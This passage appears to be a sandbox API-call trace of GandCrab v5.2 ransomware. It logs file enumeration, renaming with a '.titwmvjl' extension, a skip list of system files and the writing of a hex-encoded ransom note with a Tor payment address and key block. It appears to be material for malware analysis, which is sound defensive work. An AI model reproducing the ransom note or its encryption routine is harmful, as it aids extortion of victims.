\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.142] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0096.142] CloseHandle (hObject=0x2bc) returned 1 [0096.142] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.143] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.143] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1c9)) [0096.143] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.143] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.143] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.143] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock") returned 86 [0096.143] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0096.145] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.145] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.145] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\") returned 62 [0096.145] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*" [0096.146] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5035b8 [0096.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.146] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.146] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.146] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.146] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.146] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock" [0096.146] lstrlenW (lpString=".titwmvjl") returned 9 [0096.146] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock") returned 86 [0096.146] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.147] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0096.147] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\d2ca4a09d2ca4deb61a.lock") returned 86 [0096.147] lstrlenW (lpString=".lock") returned 5 [0096.147] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.147] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.147] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.147] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.147] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.147] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.147] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.147] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt" [0096.147] lstrlenW (lpString=".titwmvjl") returned 9 [0096.147] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt") returned 82 [0096.147] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.148] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0096.148] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt") returned 82 [0096.148] lstrlenW (lpString=".txt") returned 4 [0096.148] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.148] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.148] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.148] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.148] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt") returned 82 [0096.148] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TITWMVJL-DECRYPT.txt") returned 82 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.148] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.148] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.148] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.148] lstrcmpW (lpString1="TrainedDataStore", lpString2=".") returned 1 [0096.149] lstrcmpW (lpString1="TrainedDataStore", lpString2="..") returned 1 [0096.149] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2="TrainedDataStore" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0096.149] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\" [0096.149] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.149] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.149] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.149] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.149] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.150] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.150] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.150] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.150] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\\\TITWMVJL-DECRYPT.txt") returned 100 [0096.150] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0096.150] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x